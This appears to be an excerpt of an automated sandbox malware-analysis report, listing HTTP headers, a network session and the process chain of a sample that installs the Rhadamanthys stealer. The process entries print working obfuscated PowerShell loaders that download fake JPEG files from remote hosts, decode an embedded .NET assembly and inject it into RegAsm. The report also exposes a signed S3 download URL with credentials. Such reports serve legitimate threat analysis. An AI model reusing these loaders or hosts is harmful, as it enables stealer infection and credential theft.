                                                                                          X-Render-Time: 0.0530238151550293
                                                                                          X-B3-Traceid: 810b552fe51c46f28a2c2f9a344f92b7
                                                                                          X-B3-Spanid: 2d829d0d1cb53d6f
                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                          Content-Security-Policy: script-src 'unsafe-eval' 'strict-dynamic' 'unsafe-inline' 'self' http: https: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net https://remote-app-switcher.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/; style-src 'self' 'unsafe-inline' https://aui-cdn.atlassian.com/ https://cdn.cookielaw.org/ https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net https://bbc-frontbucket-canary.prod-east.frontend. [TRUNCATED]
                                                                                          X-Usage-Quota-Remaining: 999035.462
                                                                                          X-Usage-Request-Cost: 980.10
                                                                                          X-Usage-User-Time: 0.020172
                                                                                          X-Usage-System-Time: 0.009231
                                                                                          X-Usage-Input-Ops: 0
                                                                                          X-Usage-Output-Ops: 0
                                                                                          Age: 0
                                                                                          X-Cache: MISS
                                                                                          X-Content-Type-Options: nosniff
                                                                                          X-Xss-Protection: 1; mode=block
                                                                                          Atl-Traceid: 810b552fe51c46f28a2c2f9a344f92b7
                                                                                          Atl-Request-Id: 810b552f-e51c-46f2-8a2c-2f9a344f92b7
                                                                                          Strict-Transport-Security: max-age=63072000; includeSubDomains; preload
                                                                                          Report-To: {"endpoints": [{"url": "https://dz8aopenkvv6s.cloudfront.net"}], "group": "endpoint-1", "include_subdomains": true, "max_age": 600}
                                                                                          Nel: {"failure_fraction": 0.001, "include_subdomains": true, "max_age": 600, "report_to": "endpoint-1"}
                                                                                          Server-Timing: atl-edge;dur=166,atl-edge-internal;dur=4,atl-edge-upstream;dur=164,atl-edge-pop;desc="aws-eu-central-1"
                                                                                          Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49738 | 54.231.134.241 | 443 | 8112 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Timestamp | Bytes transferred | Direction | Data
2025-01-20 14:49:12 UTC | 1219 | OUT | GET /a613a3a7-960e-457b-ade9-adac2ded05f8/downloads/13e6a3ab-36e2-4926-afc8-122cd28abbda/test.jpg?response-content-disposition=attachment%3B%20filename%3D%22test.jpg%22&AWSAccessKeyId=ASIA6KOSE3BNBTKKJY5M&Signature=WrRRG%2FjNv0KYJyVNvKxc%2BY6fR%2B0%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEK%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIHqlgISaXQZNWVdHrtqHFQM1aKdCCC5wz47mj8NtMH%2BIAiBdtBjgyJZ6tj7uXWFGVxbXJfoLZTyvi2A7sXwcgSrL%2BSqwAgio%2F%2F%2F%2F%2F%2F%2F%2F%2F%2F8BEAAaDDk4NDUyNTEwMTE0NiIMFJaKkm%2Baexgdux4uKoQC6KXHopDQ%2FlrvHmoVWqroq7CEf10111jAHgCJB1MtIiwoslQvWwr%2B0TjbV0drvIlTQrZSoCEisB3EKyeKiSOdy4cG7zLV8sUpkCTFObt0YVdcZihx5WCNnElUd6Q0GtOsyOJ54uKNitBk4qLGC%2F8FLxoWB8Zd7GFtIhjBH6oiR29zWtJHxVJMEzbEk0X8I6ra5TJTAxAmj%2FGBrJRWzhpL7djvH%2BWsC9IJL3xndZ130rjzzEn3Hy0dMH4Ffr76tlD%2FuZUeGrYyghPc8SyR5fqjbJHN3e9nSOiKDWOIXmDqOsRdlmX0FjNbG66IlTsda3suu%2BoRn1c7bGtYzOEXJO6jQojgYsEwsMC5vAY6ngHasjGz4hS4AfIgJXweXhdRz1bV7MycPu%2FtoygR37IQAI2SIbv%2BJt7FUa41kbstbCnTf83poZhHfI9%2FRbWfaSYmj1qK922%2BqxSm9MABVAMkZx5JZm3rwCcg5 [TRUNCATED]
Host: bbuseruploads.s3.amazonaws.com
Connection: Keep-Alive
2025-01-20 14:49:12 UTC | 524 | IN | HTTP/1.1 200 OK
                                                                                          x-amz-id-2: lj9larRJl8uKniQI0CbfGSGAebzGz3fN7qvuYEhjB1QEZXsGcp7ZexS05kzQeiHjN8iHnfzWfiI=
                                                                                          x-amz-request-id: K3TGRSCQXEEJRZPG
                                                                                          Date: Mon, 20 Jan 2025 14:49:13 GMT
                                                                                          Last-Modified: Fri, 17 Jan 2025 19:10:25 GMT
                                                                                          ETag: "30042fc109c67d40cdf5dd596e06bd73"
                                                                                          x-amz-server-side-encryption: AES256
                                                                                          x-amz-version-id: n0W6vcxraIiAeYkdm0AcSI9rBn_VJJXj
                                                                                          Content-Disposition: attachment; filename="test.jpg"
                                                                                          Accept-Ranges: bytes
                                                                                          Content-Type: image/jpeg
                                                                                          Content-Length: 1783795
                                                                                          Server: AmazonS3
                                                                                          Connection: close


                                                                                          Target ID:0
                                                                                          Start time:09:48:46
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Users\user\Desktop\good.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Users\user\Desktop\good.exe"
                                                                                          Imagebase:0x7ff731910000
                                                                                          File size:164'352 bytes
                                                                                          MD5 hash:1F060BE9FBFE90811A71414791AB8C1B
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:low
                                                                                          Has exited:true

                                                                                          Target ID:1
                                                                                          Start time:09:48:46
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\cmd.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:cmd.exe /c fwr.vbs
                                                                                          Imagebase:0x7ff60f2b0000
                                                                                          File size:289'792 bytes
                                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:2
                                                                                          Start time:09:48:46
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                          Imagebase:0x7ff7699e0000
                                                                                          File size:862'208 bytes
                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:3
                                                                                          Start time:09:48:46
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\wscript.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\fwr.vbs"
                                                                                          Imagebase:0x7ff789530000
                                                                                          File size:170'496 bytes
                                                                                          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:4
                                                                                          Start time:09:48:59
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\rundll32.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                                                                                          Imagebase:0x7ff63b0e0000
                                                                                          File size:71'680 bytes
                                                                                          MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                          Has elevated privileges:false
                                                                                          Has administrator privileges:false
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

                                                                                          Target ID:6
                                                                                          Start time:09:49:06
                                                                                          Start date:20/01/2025
                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                          Wow64 process (32bit):false
                                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO@GU@d@@u@FM@ZQBy@HY@aQBj@GU@U@Bv@Gk@bgB0@E0@YQBu@GE@ZwBl@HI@XQ@6@Do@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@@g@D0@I@Bb@E4@ZQB0@C4@UwBl@GM@dQBy@Gk@d@B5@F@@cgBv@HQ@bwBj@G8@b@BU@Hk@c@Bl@F0@Og@6@FQ@b@Bz@DE@Mg@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgB1@G4@YwB0@Gk@bwBu@C@@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@RgBy@G8@bQBM@Gk@bgBr@HM@I@B7@C@@c@Bh@HI@YQBt@C@@K@Bb@HM@d@By@Gk@bgBn@Fs@XQBd@CQ@b@Bp@G4@awBz@Ck@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B3@GU@YgBD@Gw@aQBl@G4@d@@g@D0@I@BO@GU@dw@t@E8@YgBq@GU@YwB0@C@@UwB5@HM@d@Bl@G0@LgBO@GU@d@@u@Fc@ZQBi@EM@b@Bp@GU@bgB0@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@C@@PQ@g@Ec@ZQB0@C0@UgBh@G4@Z@Bv@G0@I@@t@Ek@bgBw@HU@d@BP@GI@agBl@GM@d@@g@CQ@b@Bp@G4@awBz@C@@LQBD@G8@dQBu@HQ@I@@k@Gw@aQBu@Gs@cw@u@Ew@ZQBu@Gc@d@Bo@Ds@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@ZgBv@HI@ZQBh@GM@a@@g@Cg@J@Bs@Gk@bgBr@C@@aQBu@C@@J@Bz@Gg@dQBm@GY@b@Bl@GQ@T@Bp@G4@awBz@Ck@I@B7@C@@d@By@Hk@I@B7@C@@cgBl@HQ@dQBy@G4@I@@k@Hc@ZQBi@EM@b@Bp@GU@bgB0@C4@R@Bv@Hc@bgBs@G8@YQBk@EQ@YQB0@GE@K@@k@Gw@aQBu@Gs@KQ@g@H0@I@Bj@GE@d@Bj@Gg@I@B7@C@@YwBv@G4@d@Bp@G4@dQBl@C@@fQ@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@By@GU@d@B1@HI@bg@g@CQ@bgB1@Gw@b@@g@H0@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@Gw@aQBu@Gs@cw@g@D0@I@B@@Cg@JwBo@HQ@d@Bw@HM@Og@v@C8@YgBp@HQ@YgB1@GM@awBl@HQ@LgBv@HI@Zw@v@GQ@ZgBn@Gg@Z@@v@GY@ZwBk@C8@Z@Bv@Hc@bgBs@G8@YQBk@HM@LwB0@GU@cwB0@C4@agBw@Gc@Pw@1@DE@Nw@2@DE@Mw@n@Cw@I@@n@Gg@d@@z@DU@LwBu@GE@bgBv@C8@cgBl@GY@cw@v@Gg@ZQBh@GQ@cw@v@G0@YQBp@G4@LwBu@GU@dwBf@Gk@bQBn@DE@Mg@z@C4@agBw@Gc@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bp@G0@YQBn@GU@QgB5@HQ@ZQBz@C@@PQ@g@EQ@bwB3@G4@b@Bv@GE@Z@BE@GE@d@Bh@EY@cgBv@G0@T@Bp@G4@awBz@C@@J@Bs@Gk@bgBr@HM@Ow@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@Bp@GY@I@@o@CQ@aQBt@GE@ZwBl@EI@eQB0@GU@cw@g@C0@bgBl@C@@J@Bu@HU@b@Bs@Ck@I@B7@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@
@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@V@Bl@Hg@d@@u@EU@bgBj@G8@Z@Bp@G4@ZwBd@Do@OgBV@FQ@Rg@4@C4@RwBl@HQ@UwB0@HI@aQBu@Gc@K@@k@Gk@bQBh@Gc@ZQBC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@I@@9@C@@Jw@8@Dw@QgBB@FM@RQ@2@DQ@XwBT@FQ@QQBS@FQ@Pg@+@Cc@Ow@g@CQ@ZQBu@GQ@RgBs@GE@Zw@g@D0@I@@n@Dw@P@BC@EE@UwBF@DY@N@Bf@EU@TgBE@D4@Pg@n@Ds@I@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@9@C@@J@Bp@G0@YQBn@GU@V@Bl@Hg@d@@u@Ek@bgBk@GU@e@BP@GY@K@@k@HM@d@Bh@HI@d@BG@Gw@YQBn@Ck@Ow@g@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GU@bgBk@Ek@bgBk@GU@e@@g@D0@I@@k@Gk@bQBh@Gc@ZQBU@GU@e@B0@C4@SQBu@GQ@ZQB4@E8@Zg@o@CQ@ZQBu@GQ@RgBs@GE@Zw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@aQBm@C@@K@@k@HM@d@Bh@HI@d@BJ@G4@Z@Bl@Hg@I@@t@Gc@ZQ@g@D@@I@@t@GE@bgBk@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@Gc@d@@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@p@C@@ew@g@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@g@Cs@PQ@g@CQ@cwB0@GE@cgB0@EY@b@Bh@Gc@LgBM@GU@bgBn@HQ@a@@7@C@@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YgBh@HM@ZQ@2@DQ@T@Bl@G4@ZwB0@Gg@I@@9@C@@J@Bl@G4@Z@BJ@G4@Z@Bl@Hg@I@@t@C@@J@Bz@HQ@YQBy@HQ@SQBu@GQ@ZQB4@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bi@GE@cwBl@DY@N@BD@G8@bQBt@GE@bgBk@C@@PQ@g@CQ@aQBt@GE@ZwBl@FQ@ZQB4@HQ@LgBT@HU@YgBz@HQ@cgBp@G4@Zw@o@CQ@cwB0@GE@cgB0@Ek@bgBk@GU@e@@s@C@@J@Bi@GE@cwBl@DY@N@BM@GU@bgBn@HQ@a@@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bgBn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@CQ@YwBv@G0@bQBh@G4@Z@BC@Hk@d@Bl@HM@I@@9@C@@WwBT@Hk@cwB0@GU@bQ@u@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@RgBy@G8@bQBC@GE@cwBl@DY@N@BT@HQ@cgBp@G4@Zw@o@CQ@YgBh@HM@ZQ@2@DQ@QwBv@G0@bQBh@G4@Z@@p@Ds@I@@g@C@@J@B0@GU@e@B0@C@@PQ@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@Ds@I@@k@Gw@bwBh@GQ@ZQBk@EE@cwBz@GU@bQBi@Gw@eQ@g@D0@I@Bb@FM@eQBz@HQ@ZQBt@C4@UgBl@GY@b@Bl@GM@d@Bp@G8@bg@u@EE@cwBz@GU@bQBi@Gw@eQBd@Do@OgBM@G8@YQBk@Cg@J@Bj@G8@bQBt@GE@bgBk@EI@eQB0@GU@cw@p@Ds@I@@g@CQ@RQBu@GM@bwBk@GU@Z@BU@GU@e@B0@C@@PQBb@EM@bwBu@HY@ZQBy@HQ@XQ@6@Do@V@Bv@EI@YQBz@GU@Ng@0@FM@d@By@Gk@bg
Bn@Cg@J@BC@Hk@d@Bl@HM@KQ@7@@0@Cg@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@k@GM@bwBt@H@@cgBl@HM@cwBl@GQ@QgB5@HQ@ZQBB@HI@cgBh@Hk@I@@9@C@@RwBl@HQ@LQBD@G8@bQBw@HI@ZQBz@HM@ZQBk@EI@eQB0@GU@QQBy@HI@YQB5@C@@LQBi@Hk@d@Bl@EE@cgBy@GE@eQ@g@CQ@ZQBu@GM@V@Bl@Hg@d@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@B0@Hk@c@Bl@C@@PQ@g@CQ@b@Bv@GE@Z@Bl@GQ@QQBz@HM@ZQBt@GI@b@B5@C4@RwBl@HQ@V@B5@H@@ZQ@o@Cc@d@Bl@HM@d@Bw@G8@dwBl@HI@cwBo@GU@b@Bs@C4@S@Bv@GE@YQBh@GE@YQBh@HM@Z@Bt@GU@Jw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@BF@G4@YwBv@GQ@ZQBk@FQ@ZQB4@HQ@I@@9@Fs@QwBv@G4@dgBl@HI@d@Bd@Do@OgBU@G8@QgBh@HM@ZQ@2@DQ@UwB0@HI@aQBu@Gc@K@@k@EI@eQB0@GU@cw@p@Ds@DQ@K@C@@I@@g@C@@I@@g@C@@I@@g@C@@I@@N@@o@I@@g@C@@I@@g@C@@I@@g@C@@I@@g@C@@J@Bt@GU@d@Bo@G8@Z@@g@D0@I@@k@HQ@eQBw@GU@LgBH@GU@d@BN@GU@d@Bo@G8@Z@@o@Cc@b@Bm@HM@ZwBl@GQ@Z@Bk@GQ@Z@Bk@GQ@YQ@n@Ck@LgBJ@G4@dgBv@Gs@ZQ@o@CQ@bgB1@Gw@b@@s@C@@WwBv@GI@agBl@GM@d@Bb@F0@XQ@g@Cg@Jw@g@HQ@e@B0@C4@YwBo@EE@RgBB@G0@aw@v@HM@ZQBs@Gk@ZgBf@GM@aQBs@GI@dQBw@C8@N@@2@C4@Ng@y@DI@Lg@w@DY@Lg@y@DY@Lw@v@Do@Jw@s@C@@Jw@w@Cc@L@@g@Cc@UwB0@GE@cgB0@HU@c@BO@GE@bQBl@Cc@L@@g@Cc@UgBl@Gc@QQBz@G0@Jw@s@C@@Jw@w@Cc@KQ@p@H0@fQ@=';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $dosigo.replace('@','A') ));powershell.exe $OWjuxD .exe -windowstyle hidden -exec
                                                                                          Imagebase:0x7ff788560000
                                                                                          File size:452'608 bytes
                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                          Has elevated privileges:true
                                                                                          Has administrator privileges:true
                                                                                          Programmed in:C, C++ or other language
                                                                                          Reputation:high
                                                                                          Has exited:true

Target ID: 7
Start time: 09:49:06
Start date: 20/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 10
Start time: 09:49:08
Start date: 20/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/dfghd/fgd/downloads/test.jpg?517613', 'ht35/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.chAFAmk/selif_cilbup/46.622.06.26//:', '0', 'StartupName', 'RegAsm', '0'))}}" .exe -windowstyle hidden -exec
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 11
Start time: 09:49:16
Start date: 20/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase: 0xf00000
File size: 65'440 bytes
MD5 hash: 0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000B.00000002.2010712842.0000000002F70000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: true

Target ID: 12
Start time: 09:49:18
Start date: 20/01/2025
Path: C:\Windows\SysWOW64\fontdrvhost.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\System32\fontdrvhost.exe"
Imagebase: 0x280000
File size: 676'584 bytes
MD5 hash: 8D0DA0C5DCF1A14F9D65F5C0BEA53F3D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000C.00000003.2003819326.0000000002BF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000003.2008104480.0000000005120000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000C.00000003.2008517695.0000000005340000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
• Rule: JoeSecurity_RHADAMANTHYS, Description: Yara detected RHADAMANTHYS Stealer, Source: 0000000C.00000002.2037609353.0000000003070000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation: moderate
Has exited: true

Target ID: 15
Start time: 09:49:18
Start date: 20/01/2025
Path: C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\WerFault.exe -u -p 7256 -s 676
Imagebase: 0x8b0000
File size: 483'680 bytes
MD5 hash: C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true
